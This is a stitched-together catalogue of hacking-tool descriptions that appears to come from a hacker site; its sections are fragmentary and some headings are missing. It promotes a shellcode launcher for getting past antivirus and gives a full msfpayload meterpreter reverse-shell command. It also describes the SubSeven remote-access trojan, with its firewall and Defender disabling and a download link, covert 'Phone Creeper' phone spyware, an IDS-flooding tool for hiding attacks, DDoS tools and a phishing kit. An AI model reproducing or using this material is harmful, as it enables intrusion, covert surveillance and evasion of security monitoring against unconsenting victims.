o Download links to webservers: WAMP (windows) XAMPP (windows/linux/mac/solaris) and MAMP (mac)
o AnonProxy*
o FormFlood Form Flooder*
o Mail flooder
o Miniloader
o Myspace phisher
o Vampire Raep script
o Raid Imagery
+ Hueg3.jpg
+ watermarks
+ Goatse
* Moar new shit
o /i/Kit + Hackerpackage included
o General updates and a lot of shit added.

Items marked with a * are new or updated in the most recent version.


= Short description =

shellcodeexec is a small script to execute in memory a sequence of opcodes.

= Background =

Most of the shellcode launchers out there, including proof of concepts
part of many « security » books, detail how to allocate a memory page as
readable/writable/executable on POSIX systems, copy over your shellcode
and execute it. This works just fine. However, it is limited to POSIX,
does not necessarily consider 64-bit architecture and Windows systems.

= Description =

This script and the relevant project files (Makefile and Visual Studio
files) allow you to compile the tool once then run your shellcode across
different architectures and operating systems.

Moreover, it solves a common real world issue: the target system’s anti
virus software blocking a Metasploit-generated payload stager (either EXE
of ELF). Take for instance the following command line:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST= R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe

This generates a Metasploit payload stager, payload.exe, that as soon as
it lands on the AV-protected target system is recognized as malicious and
potentially blocked (depending on the on-access scan settings) by many
anti virus products. At the time of writing this text, 21 out 41 anti
viruses detect it as malicious – By encoding it
multiple times with msfencode, less AV softwares detect it, still a lot.

I have been surfing the Net and found some interesting tutorials and
guides about packing, compressing, obfuscating and applying IDA-foo to
portable executables et similar in order to narrow down the number of AV
products that can detect it as a malicious file. This is all interesting,
but does not stop few hard-to-die anti viruses to detect your backdoor.

So the question is, how cool would it be to have a final solution to avoid
all this hassle? This is exactly where this tool comes into play!

= Features =


* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.

* Can be compiled and works on 32-bit and 64-bit architectures.

* As far as I know, no AV detect it as malicious.

* Works in DEP/NX-enabled environments: it allocates the memory page where
it stores the shellcode as +rwx – Readable Writable and eXecutable.

* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
shellcode (generated for instance with Metasploit’s msfpayload) to
Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the
BufferRegister variable to EAX registry where the address in memory of
the shellcode will be stored, to avoid get_pc() binary stub to be
prepended to the shellcode.

* Spawns a new thread where the shellcode is executed in a structure
exception handler (SEH) so that if you wrap shellcodeexec into your own
executable, it avoids the whole process to crash in case of unexpected


SubSeven 2.3 is a simple, easy to use remote administration tool (RAT) designed to work on all current Windows platforms, both 32bit and 64bit. This tool is aimed at people who want that little bit more power and control over remote computer management. Please use this tool responsibly and read and accept the disclaimer prior to use. If you do not agree with the disclaimer, please do not use the tool. You accept full liability and responsibility for your actions when using SubSeven. Do not use this tool on computers you are not authorized to control.

Features overview

SubSeven.exe (911KB)


– Transfer View (view upload/download details <-> from host)
– Window View (View active Windows on SubSeven)


– File Manager (upload/download/run/delete/play files on host)
– Registry Manager (modify/add/remove registry entries on host)
– Service Manager (refresh services/install services/remove services/remote host management)
– Process Manager (view active/kill active processes to dll level)
– Fun Manager (general office pranks)


– Desktop (view and click the remote host desktop)
– Webcam (view the webcam on the remote host)
– Audio (capture mic/line-in input no the remote host)
GIF – 2.4 kb


– TCP Tunnel (relay remote host ports to local PC)
– Traffic Viewer (lists active network connections on remote host)
– Network Browser (list shares on remote host, allows mapping)


– Remote Shell (view the command prompt on the remote host as if it was local)
– Password (recover lost/forgotten passwords for various browsers, storage, mail clients and instant messengers)
– Installed Apps (list installed applications)
– Server Options (stop/start/remove server on remote host)

Built in Tools:

– Static IP Notification Client (SIN client) (a listening tool that allows your remote hosts to notify you when they are online)
– NO-IP account / IP auto update tool (allows you to enter your NO-IP account information to auto update the website of IP changes)
– Shortcut Panel (allows you to add your favorite utilities as shortcuts
– Hint and Active running status bar (gives you some helpful information)

EditServer.exe (254KB)

Server Status:

– Read (allows you to browse and then read the server settings)
– Server extensions (allows you to check which extension you want the server to use)
– Install directory (allows you where you would like the server to be installed)
– Protect server (allows you to password protect the server)
– Melt server (allows the server to disappear once executed)
– Wait for reboot (waits to execute upon next reboot)
– Run Visible (allows the host computer to know the server is running)
– Server name (what it says)

Fake Messages:

– Enable (actives the fake message option)
– Message icon (allows you to choose your icon for the message)
– Available buttons (select what options the host computer has to press)
– Message title (the title text for the message)
– Message text (the body text of the message)
– Test (allows you to test the message on your PC)

Startup methods:

– Registry Run (installs under registry run key)
– Registry RunServices (installs under registry runservices key)
– Registry RunOnce (installs under registry runonce key)
– ActiveX (installs in the activeX key path)
– Explorer (installs on execution of explorer shell)
– Winlogon (same as above for winlogon)
– Policies (executes upon windows policies startup)
– Key name (keyname for registry entries. For example Remote Host Server)


– S.I.N (specify your local network external IP address here, or for local testing
– CGI/PHP (specify your website address, e.g, generate the script and upload it to your php/cgi host)

Bind Files:

– Select a file to bind to the server. The binded file will execute along with the server – for example you may want to execute tinyvnc for full screen management)

Win Firewall:

– Disable Firewall (turns off the firewall providing UAC is off)
– Disable Win defender (turns off windows defender)
– Disable UAC (turns off UAC upon next reboot)

Exe Icon:

– Load .dll/exe (load up an exe or .dll file to extract icons and use them on your server)
– Browser (browse to .ico files)

Server.exe (58.5KB)

– This is your configured server to deploy on the remote host.

Download >>—sys/SubSeven_2.3.rar


winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares.

Autohack your targets with least possible interaction.


* Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits.
* No need to debug, script or compile the source codes.
* Scans all ports 1 -* 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT)
* PortScan is multi-threaded.
* Doesn’t require any Database at the back-end like others
* Can be also be used to test effectiveness of IDS/IPS
* Launched exploits are independent and doesn’t rely on service fingerprinting (to avoid evasion, if any)


DB Audit

DB Audit Expert is a professional database auditing solution for Oracle, Sybase, DB2, MySQL and Microsoft SQL Server. DB Audit Expert enables database and system administrators, security administrators, auditors and operators to track and analyze any database activity including database security, access and usage, data creation, change or deletion. What makes DB Audit really unique is its built-in support for multiple auditing methods giving you the flexibility to choose the best fit for your database security requirements.

Features :

– Improves system security and ensures system accountability. Captures both regular and « back-door » access to audited database systems.
– Features centralized auditing control of multiple database systems from a single location providing ease of management.
– Features unified auditing graphical interface that shortens the learning curve and is easy to use.
– Provides analytical reports that reduce large amounts of audit data to comprehensive summaries thus enabling to easily identify various database security violations.
– Provides analytical reports that help to identify which processes and users are hogging system resources.
– Provides audit trail details that are unavailable from native database audit utilities.
– Provides ability to generate real-time email alerts to key personnel when changes occur to sensitive data.
– Frees DBA from the need to create and manage finely-tuned database triggers for data-change auditing purposes.
– Supports flexibility auditing configurations, enabling security personnel to choose specific types of database operations and data changes that must be monitored and recorded in the audit trail.
– Provides totally transparent system-level and data-change auditing of any existing applications without requiring any changes to be made in those applications.
– Full compatibility with all host Operation Systems on which the supported databases can run, including but not limited to Windows NT, UNIX, Linux, VMS, OS/390, z/OS.


ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.


Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.


1. Supported Databases with injection methods:
1. MsSQL 2000/2005 with error
2. MsSQL 2000/2005 no error (union based)
3. MySQL (union based)
4. MySQL Blind
5. MySQL error based
6. Oracle (union based)
7. MsAccess (union based)

2. Automatic database detection
3. Automatic type detection (string or integer)
4. Automatic keyword detection (finding difference between the positive and negative response)
5. Trying different injection syntaxes
6. Proxy support
7. Real time result
8. Options for replacing space by /**/,+,… against IDS or filters
9. Avoid using strings (magic_quotes similar filters bypass)
10 Bypassing illegal union
11 Full customizable http headers (like referer and user agent)
12 Load cookie from site for authentication
13 Guessing tables and columns in mysql<5 (also in blind) and MsAccess
14 Fast getting tables and columns for mysql
15 Multi thread Admin page finder
16 Multi thread Online MD5 cracker
17 Getting DBMS Informations
18 Getting tables, columns and data
19 Command executation (mssql only)
20 Reading system files (mysql only)
21 insert/update/delete data


Oscanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with a couple of plugins that currently do:

– Sid Enumeration
– Passwords tests (common & dictionary)
– Enumerate Oracle version
– Enumerate account roles
– Enumerate account privileges
– Enumerate account hashes
– Enumerate audit information
– Enumerate password policies
– Enumerate database links

The results are given in a graphical java tree.


SFX-SQLi (Select For XML SQL injection) is a new SQL injection technique which allows to extract the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way.

This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field injecting a subquery into a vulnerable input of a web application.

Safe3 SQL Injector

Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.

his is a list of the available features:

* Full support for GET/Post/Cookie Injection
* Full support for HTTP Basic, Digest, NTLM and Certificate authentications
* Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite
* Full support for Error/Union/Blind/Force SQL injection
* Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.
* Super bypass WAF


Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names.


Toolza – SQL Injection Tool with many options

Features of toolza:
– LFI/Reader/Loade_file() bruter
– Scan site for folders & files
– FTP checker
– FTP bruter
– Proxy checker
– Proxy grabber

Post/Get/Proxy/SOCKS4-5/Cookies/Timeout/Multithread/HTTPS+Authorization supported
– Select POST or GET
– Support for proxy (file proxy.txt) – avtocheking, working with the first working
– Support for SOCKS4-5 (file socks.txt) – avtocheking, auto-sensing type socks (4-5), without authorization, working with the first working
– Select a timeout connection
– Ability to insert cookies
– Ability to change user agent
– Ability to change the referrer
– Ability to select HTTP-protocol (0 – HTTP/1.0; 1 – HTTP/1.1; Default – 1)


This perl script allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections. Databases supported:


1. MySQL

2. PostgreSQL

3. Oracle

The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in « order by » and « group by ».

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

-cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

-cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first


Hexjector is an Opensource,Multi-Platform PHP script to automate site Pentest for SQL Injection Vulnerabilties.


sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.


qlninja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide an interactive access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.


* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
* Bruteforce of ’sa’ password (in 2 flavors: dictionary-based and incremental)
* Privilege escalation to sysadmin group if ’sa’ password has been found
* Creation of a custom xp_cmdshell if the original one has been removed
* Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames
* Evasion techniques to confuse a few IDS/IPS/WAF
* Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection


nguma is a penetration testing toolkit entirely written in python. The framework includes modules to discover hosts, gather information about, fuzz targets, brute force user names and passwords and, of course, exploits.

While the current exploitation capabilities in Inguma may be limited, this program provides numerous tools for information gathering and target auditing. Inguma is still being heavily developed so be sure to stay current and check back for news and updates.


(OAT) OCS Assessment Tool

OAT is an Open Source Security tool designed to check the password strength of Microsoft Office Communication Server users. After a password is compromised, OAT demonstrates potential UC attacks that can be performed by legitimate users if proper security controls are not in place.


The first network auditing distribution for mobile phone released.

The NeoPwn Mobile Pentesting project is proud to announce that it is merging with BackTrack, to produce the first ever BackTrack Mobile suite!

Phone Creeper

Phone Creeper is a phone espionage suite It can be silently installed by just inserting an sd card with the files below on it.
The program does not show up under installed programs or running programs and allows for a useful array or features. Phones running this software can be remotely controled by sms text messages. All commands will be silently received and deleted immediately and results will be issued back to sender.
Pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device.”



FireCAT (Firefox Catalog of Auditing exTension) is a mindmap collection of the most efficient and useful firefox extensions oriented application security auditing and assessment. FireCAT is not a remplacement of other security utilities and softwares as well as fuzzers, proxies and application vulnerabilities scanners.


Peach is a SmartFuzzer that is capable of performing both generation and mutation based fuzzing.

Peach requires the creation of PeachPit files that define the structure, type information, and relationships in the data to be fuzzed. It additionally allows for the configuration of a fuzzing run including selecting a data transport (Publisher), logging interface, etc.


Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc.

SpiderLab Tools

SpiderLabs has developed dozens of tools over the years. Most of them end up as internal-only tools since they eventually make their way into one of Trustwave’s product offerings.


hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

While hping was mainly used as a security tool in the past, it can be used in many ways by people that don’t care about security to test networks and hosts. A subset of the stuff you can do using hping:

* Firewall testing
* Advanced port scanning
* Network testing, using different protocols, TOS, fragmentation
* Manual path MTU discovery
* Advanced traceroute, under all the supported protocols
* Remote OS fingerprinting
* Remote uptime guessing
* TCP/IP stacks auditing
* hping can also be useful to students that are learning TCP/IP.


PenTBox is a Security Suite that packs a lot of security and stability testing oriented programs for networks and systems.
For example, the Suite has Honeypot, TCP Flood Denial of Service testing tools, Secure Instant Messaging, Port Scanner, Fuzzer, Secure passwords generator and more.
All programs are being developed by PenTBox Team and the contributors of the Free Software community to the project.
Programmed in Ruby, and oriented to GNU/Linux systems (but compatible with Windows, MacOS and more).
It is free, licensed under GNU/GPLv3.



6tunnel allows you to use services provided by IPv6 hosts with IPv4-only applications and vice-versa. It can bind to any of your IPv4 (default) or IPv6 addresses and forward all data to IPv4 or IPv6 (default) host.


Application Layer DDoS Simulator

ddosim is a tool that can be used in a laboratory environment to simulate a distributed denial of service (DDOS) attack against a target server. The test will show the capacity of the server to handle application specific DDOS attacks. ddosim simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, ddosim starts the conversation with the listening application (e.g. HTTP server).

ddosim is written in C++ and runs on Linux. Its current functionalities include:

* HTTP DDoS with valid requests
* HTTP DDoS with invalid requests (similar to a DC++ attack)
* TCP connection flood on random port

Echo Mirage

Echo Mirage is a generic network proxy. It uses DLL injection and function hooking techniques to redirect network related function calls so that data transmitted and received by local applications can be observed and modified.

Windows encryption and OpenSSL functions are also hooked so that plain text of data being sent and received over an encrypted session is also available.

Traffic can be intercepted in real-time, or manipulated with regular expressions and action scripts

Low Orbit Ion Cannon

Low Orbit Ion Cannon (LOIC) is an open source program written in McDonald’s Visual C# coding environment. It is used for DDoSing websites and testing server security.

LOIC (Low Orbit Ion Cannon) is a network stress testing application, written in C# and developed by « praetox ». It attempts a denial-of-service attack on the target site by flooding the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host. The program was exploited during Project Chanology to attack Scientology websites, and is currently being used by Operation Avenge Assange (Organized by Operation Payback) to attack the websites of companies and organizations that have opposed WikiLeaks


Mausezahn is a free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. It is mainly used to test VoIP or multicast networks but also for security audits to check whether your systems are hardened enough for specific attacks.
Mausezahn can be used for example:

* As traffic generator (e. g. to stress multicast networks)
* To precisely measure jitter (delay variations) between two hosts (e. g. for VoIP-SLA verification)
* As didactical tool during a datacom lecture or for lab exercises
* For penetration testing of firewalls and IDS
* For DoS attacks on networks (for audit purposes of course)
* To find bugs in network software or appliances
* For reconnaissance attacks using ping sweeps and port scans
* To test network behaviour under strange circumstances (stress test, malformed packets, …)

…and more. Mausezahn is basically a versatile packet creation tool on the command line with a simple syntax and context help. It could also be used within (bash-) scripts to perform combination of tests. By the way, Mausezahn is quite fast; when started on my old PIII-Laptop (1.4 GHz, Gigabit Ethernet) I measured 755 Mbit/s using the interface packet counters of an HP ProCurve 5400 switch.


TCP State Exhaustion Testing With Network Expect – The Naptha vulnerabilities are a type of denial-of-service vulnerabilities researched and documented by Bob Keyes of BindView’s RAZOR Security Team in 2000. The vulnerabilities exist in some implementations of the TCP protocol, specifically in the way some TCP implementations keep track of the state of TCP connections, and allow an attacker to exhaust the resources of a system under attack without utilizing much resources on the system used to launch the attack.


The OpenDPI engine, released under the LGPL license, differs from ipoque’s commercial scanning engine in its high-priced DPI hardware. The open-source version is much slower and (more importantly) doesn’t reveal ipoque’s methods for identifying encrypted transmissions. DPI vendors all claim high levels of success at identifying such traffic based on the flow patterns and handshake signatures common to protocols like BitTorrent and Skype, even if they cannot crack the encryption and examine the content of those transmissions.


PyLoris is a tool for testing a web server’s vulnerability to a particular class of Denial of Service (DoS) attacks. It uses the Slowloris method; by using all available connections, web servers cannot complete valid requests.

PyLoris is a scriptable tool for testing a web server’s vulnerability to Denial of Service (DoS) attacks which supports SOCKS, SSL, and all HTTP request methods. It uses the Slowloris method.


QuickRecon is a simple information gathering tool that allows you to:

* Bruteforce subdomains of a target domain
* Perform zone transfer
* Gather email addresses from and
* Find human relationships using XHTML Friends Network (microformats)


RawCap is a free command line network sniffer for Windows that uses raw sockets.

Properties of RawCap:

Can sniff any interface that has got an IP address, including (localhost/loopback)
RawCap.exe is just 17 kB
No external libraries or DLL’s needed other than .NET Framework 2.0
No installation required, just download RawCap.exe and sniff
Can sniff most interface types, including WiFi and PPP interfaces
Minimal memory and CPU load
Reliable and simple to use


You will need to have administrator privileges to run RawCap.


Rebind is a DNS rebinding tool, that implements the multiple “A” record DNS rebinding attacks. It can let you access a target router’s internal Web interface! The best part is remote administration does not need to be enabled for this attack to work! All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by you. You could possibly use social engineering tricks to trick a user into viewing this web site. It does not require prior knowledge of the target router or the router’s configuration settings such as make, model, IP address, host name, etc, and does not use any anti-DNS pinning techniques. Rebind integrates a DNS server, two Web servers and an HTTP proxy server into a single Linux binary.

DNS Rebinding

Now, how do you get it to work. In the authors words –
“Actually, you need to configure your domain to use Rebind as your primary DNS server. This is done in two steps: first, you need to register the machine that you intend to run Rebind from as a nameserver, then you must configure your domain to use that nameserver. Most registrars will let you perform both of these actions, although some don’t and many make it difficult to find these settings, so you may have to search around a little.

Go to the registrar where you registered your domain name (Host-Unlimited, GoDaddy, Yahoo, etc.) and first register two nameservers. You will want to register two because most registrars will require your domain to have at least two nameservers, and you want Rebind to handle all DNS lookups. Name the nameservers ns1 and ns2 and set their IP addresses to that of the machine from where you intend to run Rebind.

Once you have registered your nameservers, go do your domain DNS settings and set these nameservers as the authoritative nameservers for your domain. If for example your domain is ‘’, you will enter and Now all DNS traffic will be directed to the machine where you intend to run Rebind, which will allow Rebind to accept and handle all DNS requests for your domain.”

Rebind has been specially programmed to work with only Linux operating systems. So, it might work on BSD, but NOT on Windows. It will also work on 64-bit operating systems. Only pre-requisite is that, it must be run as root, and you must have iptables installed and listed in $PATH. It has all images filtered out. It will not work with IPv6 either. Considering that we have another year for IPv6 to be popular, we might as well play with it for now!

Remember! You have to have the end-user visit http://your-domain-name/init and not just http://your-domain-name/. (We actually were left wondering about that!)

SSL Capable NetCat

You all know what is netcat (written by Hobbit in 1996), how to use it and that it should have been integrated in all UNIX systems a long time ago. netcat lacked some features, and I tried to add them in this Perl version. For example, SSL support, TCP and UDP proxying and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy.


ShareScan is a free utility that enables IT security personnel to identify open Windows file shares available on the internal network. This tool can help administrators identify systems that have wide open permissions or no permissions — potential vulnerabilities that should be remediated.


Slowloris HTTP DoS

T50 Sukhoi PAK FA

T50 Sukhoi PAK FA Mixed Packet Injector (a.k.a. F22 Raptor) is a tool designed to perform stress testing. It is a powerful and an unique packet injection tool, that is capable of:

* Send sequentially (i.e., ALMOST on the same time) the following protocols:

1. ICMP – Internet Control Message Protocol
2. IGMP – Internet Group Management Protocol
3. TCP – Transmission Control Protocol
4. UDP – User Datagram Protocol

* Send a (quite) incredible amount of packets per second, making it a “second to none” tool:

1. More than 1,000,000 pps of SYN Flood (+60% of the network’s uplink) in a 1000BASE-T Network (Gigabit Ethernet).
2. More than 120,000 pps of SYN Flood (+60% of the network’s uplink) in a 100BASE-TX Network (Fast Ethernet).

* Perform “Stress Testing” on a variety of network infrastructure, network devices and security solutions in place.
* Simulate Denial-of-Service attacks, validating the Firewall rules and Intrusion Detection System/Intrusion Prevention System policies.

Wont say a lot about this – just download and see for yourself the power of this tool. Oh! Did we forget to tell you that this is an open source tool, programmed in C?


A complete tool set to attack the inherent protocol weaknesses of IPV6 and ICMP6, and includes an easy to use packet factory library. Please note to get full access to all the available tools you need to develop IPV6 tools yourself or submit patches, tools and feedback to the thc-ipv6 project.

UDP Unicorn

A Win32 UDP flooding/DoS (Denial of Service) utility with multithreading. Uses winsock library to create UDP sockets and flood a target. For network security testing.


Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

Currently, there are some network protocols implemented, but others are coming (tell us which one is your preferred). Attacks for the following network protocols are implemented (but of course you are free for implementing new ones):

* Spanning Tree Protocol (STP)
* Cisco Discovery Protocol (CDP)
* Dynamic Trunking Protocol (DTP)
* Dynamic Host Configuration Protocol (DHCP)
* Hot Standby Router Protocol (HSRP)
* IEEE 802.1Q
* IEEE 802.1X
* Inter-Switch Link Protocol (ISL)
* VLAN Trunking Protocol (VTP)


HotFuzzThe HotFuzz project aims at providing a tool for discovering security vulnerabilities in network applications. At the base is the Peach fuzzing framework. To make HotFuzz understand the existing protocols, Wireshark dissectors are used. It implements a proxy functionality between network applications. It modifies the data before forwarding them to the fuzzed program. By operating as a network proxy between client and server application and performs real-time data analysis and fuzzing. We all know that Peach is capable of performing both mutation based and generation based fuzzing. Thus, we can safely say that HotFuzz is also capable of the same.

Creating a .pit file can be very difficult for inexperienced users. This is where HotFuzz comes in handy as it requires very little knowledge about the application. Infact it is so easy, that it takes the following four steps to fuzz an application –

* Configuration of the applications and the HotFuzz proxy part
* Recording
* Configuration of the fuzzing process
* Fuzzing


A very fast network logon cracker which support many different services

Number one of the biggest security holes are passwords, as every password security study shows.
Hydra is a parallized login cracker which supports numerous protocols to attack. New modules
are easy to add, beside that, it is flexible and very fast.

Currently this tool supports:
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable,
AFP, LDAP2, Cisco AAA (incorporated in telnet module).

This tool is a proof of concept code, to give researchers and security
consultants the possiblity to show how easy it would be to gain unauthorized
access from remote to a system.


Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.

* ARP-Request flooding
* ARP-Cache poisoning
* PPPoE session initiation flooding
* Blind PPPoE session termination
* ICMP-Echo flooding
* ICMP-Smurf attack
* ICMP based TCP-Connection reset
* TCP-SYN flooding
* TCP-Land attack
* Blind TCP-Connection reset
* UDP flooding
* DNS-Query flooding
* DHCP-Discover flooding
* DHCP starvation attack
* DHCP-Release forcing
* Cisco HSRP active router hijacking
* Pattern based packet address configuration
* Intelligent address and address protocol detection
* Smart wildcard-based randomization
* Daemon for setting up remote attack networks

A Simple Reverse ICMP Shell!

The main advantage over the other open source tools is that it does not require administrative privileges to run onto the target machine.


* Open source software – primarily coded by Nico, forked by me.
* Client/server architecture.
* The master is portable across any platform that can run either C, Perl or Python code.
* The target system has to be Windows because the slave runs on that platform only for now.
* The user running the slave on the target system does not require administrative privileges.


IDS/IPS/WAF Evasion & Flooding Tool

What is inundator?

inundator is a multi-threaded, queue-driven, IDS evasion tool. Its purpose is to anonymously flood intrusion detection systems (specifically Snort) with traffic designed to trigger false positives via a SOCKS proxy in order to obfuscate a real attack.

When would I use inundator?

inundator would be used whenever you feel there is a significant chance the attack you’re about to perform may be detected by the target’s intrusion detection system. You would launch inundator prior to starting the attack, and continue running it well after you have finished the attack. The hope is that if your attack is detected by the IDS, the alert will be buried among several thousand false positives, thus minimizing the chance of an IDS analyst detecting the real attack.


This little, but very usefull program, try to sends ICMP packet out the LAN, and detect all the host that allow it. Whit this you can find bugs in your (company?) network ( or others), for example hosts that allow p2p connections.


When we use a Gateway, we send the packets with IP dest of the target, but the dest mac on the ethernet is the mac at the Gateway. If we send a packet to the diferents macs in the lan, we can know who is the gateway when we recive an response from this mac.

Some times we can discover more than one box configured to be an gateway, generally, this is an wrong configuration, and the box will response with an ICMP-Redirect. This is the same, becouse the script only verify if the mac response.


Some tools for NetBIOS and DNS investigation, attacks, and communication.


* DNS backdoor (dnscat)
o v0.04
* NetBIOS queries, registrations, and releases (nbquery)
* NetBIOS sniffing and poisoning (nbsniff)
* Cross-site scripting over DNS (dnsxss)
* DNS sniffer (dnslogger)
* DNS tester (dnstest)


Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.


It is a Perl script which takes a PCAP file as input and identifies valid subnets in the same. It then assumes a netmask of /24 and searches all those subnets for live IP’s. It then groups all the IP addresses based on the number of hops.


Ostinato is an open-source, cross-platform network packet crafter/traffic generator and analyzer with a friendly GUI. Craft and send packets of several streams with different protocols at different rates. For the full feature list see below.

Ostinato aims to be « Wireshark in Reverse » and become complementary to Wireshark.


* Runs on Windows, Linux, BSD and Mac OS X (Will probably run on other platforms also with little or no modification but this hasn’t been tested)
* Support for the most common standard protocols
o Ethernet/802.3/LLC SNAP
o VLAN (with QinQ)
o ARP, IPv4, IPv6, IP-in-IP a.k.a IP Tunnelling (6over4, 4over6, 4over4, 6over6)
o Any text based protocol (HTTP, SIP, RTSP, NNTP etc.)
o More protocols in the works …
* Modify any field of any protocol (some protocols allow changing packet fields with every packet at run time e.g. changing IP/MAC addresses)
* User provided Hex Dump – specify some or all bytes in a packet
* User defined script to substitute for an unimplemented protocol (EXPERIMENTAL)
* Stack protocols in any arbitrary order
* Create and configure multiple streams
* Configure stream rates, bursts, no. of packets
* Single client can control and configure multiple ports on multiple computers generating traffic
* Exclusive control of a port to prevent the OS from sending stray packets provides a controlled testing environment
* Statistics Window shows realtime port receive/transmit statistics and rates
* Capture packets and view them (needs Wireshark to view the captured packets)
* Framework to add new protocol builders easily


Pcapdiff is a tool developed by the EFF to compare two packet captures and identify potentially forged, dropped, or mangled packets. Two technically-inclined friends can set up packet captures (e.g. tcpdump or Wireshark) on their own computers and produce network traffic between their two computers over the Internet. Later, they can run pcapdiff on the two packet capture files to identify suspicious packets for further investigation.


Luigi Auriemma has built a great tool called Proxocket, which can be used to capture calls between an application and the Winsock functions in Windows. Proxocket is simply two DLL files (ws2_32.dll and wsock32.dll) which should be placed in the same directory as the .exe of the application for which you wanna monitor network traffic. These DLL files act as proxies to the real Winsock DLL files (with the same names), which reside in « C:\Windows\System32\ ». Placing Luigi’s proxy DLLs in the same folder as the .exe file causes the application to load the proxy DLLs rather than the real Winsock DLLs. Proxocket relays all packets between the application and the real Winsock DLLs, but every relayed packet is also written to a .cap file by Proxocket.
Proxocket injects between application and Winsock

